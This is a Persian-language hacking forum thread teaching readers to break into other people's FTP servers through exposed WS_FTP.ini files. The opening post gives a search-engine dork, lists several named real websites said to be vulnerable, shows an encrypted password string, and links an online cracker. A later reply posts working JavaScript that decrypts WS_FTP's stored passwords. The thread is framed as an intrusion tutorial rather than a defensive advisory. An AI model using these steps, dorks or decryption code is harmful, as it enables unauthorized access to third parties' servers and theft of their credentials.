SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

آموزش تصویری نفوذ به FTP با WS_FTP.INI

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    آموزش تصویری نفوذ به FTP با WS_FTP.INI

    درود بر عزیزان ایران هک

    WS FTP یک برنامه سرویس گیرنده در FTP است در اینجا به بررسی آسیب پذیری موجود در این برنامه میپردازیم .

    این سرویس امکان اتصال سیستم کلاینت برای آپلود و دانلود را فراهم میسازد این اتصال مستلزم یک یوزر و پسورد میباشد . ولی این یوزر و پسورد جای زیاد امنی نگه داری نمیشه ، آسیب پذیری این سیستم ذخیره اطلاعات کاربر ها درون فایل WS_FTP.ini میباشد .


    به عنوان نمونه این لینک رو باز کنید :

    [align=left]http://www.luckypawz.com/WS_FTP/WS_FTP/WS_FTP.ini


    [/align][align=center]
    [/align]


    حالا قسمت PWD رو چک کنید همین طور که میبینید با یک پسورد طرف هستیم که البته از یک الگوریتم برای کد گذاری استفاده کرده . (UID هم که یوزر هست)

    برای کرک این نوع پسورد ها به سایت زیر مراجعه کنید و در نهایت یک فیلم آموزشی در این مورد قرار میدهیم :

    کسی از دوستان اگر SAlt این نوع پسورد رو پیدا کرد اعلام کنه تا یه Cracker براش اوکی کنیم .

    روش اول که خیلی هم ساده هست اینه که به این سایت که یه Cracker آنلاین هست وارد بشید :

    [align=left]http://decipherskull.50megs.com[/align]

    حالا PWD رو بهش میدیم و پسورد برای ما نمایش داده میشه . به یاد داشته باشین که PWD رو کامل قرار بدید به این صورت :

    کد:
    PWD=V915C878299B4A17F966C1C819AD4E881ACA7A372B56D71

    [align=center]


    [/align]کلمه کلیدی که برای این آسیب پذیری در نظر گرفتیم اینه :

    کد:
    intitle:index of ws_ftp.ini
    تعدادی سایت آسیب پذیر : [align=left]http://andre.f9ap.free.fr/WS_FTP
    http://www.cs.bgu.ac.il/~sabato/pub/WS_FTP
    http://www.luckypawz.com/WS_FTP/WS_FTP
    [/align]
    شما میتونید به سرویس FTP با ابزاری مثل CuteFTP و .... متصل بشید همچنین کامند لاین رو فراموش نکنید .

    دانلود ویدئوی آموزشی (کیفیت یکمی پائین هست بچه ها یک فیلم تهیه کنند و قرار بدند)

    کد:
    http://cld.persiangig.com/sync-view.html#2a0cf694-b897-4322-8210-4e6a76ce3348
    [align=center][/align]
    برچسب ها: هیچ یک
  • #2
    RE: آموزش تصویری نفوذ به FTP با WS_FTP.INI

    ممنون حسین جان

    دوتا سوال (( ساده برای شما ولی مبهم برای خودم )) در مورد این آسیب پذیری دارم:
    1- بعضی از وبسایتهایی که تو نتایج جستجوی ما قرار میگیرن، تو فایل WS_FTP.ini اونها چیزی بنام PWD یافت نمیکنیم. دلیل بر چی هست؟
    2- تو دایرکتوری وبسایتی همانند
    http://www.artic.edu/webspaces/viscom4570/classwork2000/deborah_baugh/assignment2/WS_FTP/WS_FTP.ini
    ما بجای PWD با ACT مواجه میشیم. آیا اینم همون مقدار PWD در در خودش داره؟؟
    نام کاربری و فعالیت مجدد به 3cure تعلق و تغییر یافت...

    نظر

    • #3
      RE: آموزش تصویری نفوذ به FTP با WS_FTP.INI

      با تشکر از حسین
      نه مهران جان اگه به الگوریتم دقت کنید میبینید با pwd یکیه و اگر کرک کنید میبنید که :

      کد:
      file folder public~html
      به نمایش در خواهد امد که اگه من اشتباه نکنم مسیر اولیه اون یوزر سایت هست یعنی اینکه به طور مثال
      کد:
      DIR="/Ipswitch/Product_Support/WS_FTP_Pro"
      در فایل public_html قرار دارد
      دقیقتر:
      کد:
      public_html/Ipswitch/Product_Support/WS_FTP_Pro

      نظر

      • #4
        RE: آموزش تصویری نفوذ به FTP با WS_FTP.INI

        درود من برای شکوندن این الگوریتم از این کد استفاده می کنم کد سایت http://decipherskull.50megs.com هست که استخراج کردم همین قدش مونده


        کد:
        <!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html" />
<meta name="author" content="alireza" />

<title>PWD</title>
</head>

<body>

<script type="text/javascript">
<!--
// ************ decipher WSFTP ***************************
function cogecifrado(inp) {
var str = "PWD="+inp;
if (str.indexOf('PWD=', 0) == -1 ||
str.length-37<0)
alert("You must enter the entire string including 'PWD=' ");

else {
passw=str.substring(37,str.length);
for (var i = 0; i<passw.length/2; i++)
{
var caracter=passw.substring(i*2,i*2+2);
var sal=str.substring(5+i,6+i);
var claro=parseInt("0x"+caracter) -i -1 - ((47+parseInt("0x"+sal))%57);
document.form1.text2.value=document.form1.text2.value+String.fromCharCode(claro);
}
}
}
// -->
// ********* End of the decipher ***********
</script>
<form name="form1">
<div align="center">
<p>
<input type="text" name="text1" value="" size="50"/>
<br/>
<br/>
<input name="button1" type="button" onclick="cogecifrado(text1.value)" value="Decipher"/>
  
<input name="Input" type="reset" value="reset"/>
<br/>
<br/>
<strong>Password Deciphered</strong><br/>
<br/>
<input type="text" name="text2" size="50"/>
<br/>
</p>
</div>
</form>

</body>
</html>

        نظر

        قبلی template بعدی
        صبر کنید ..
        X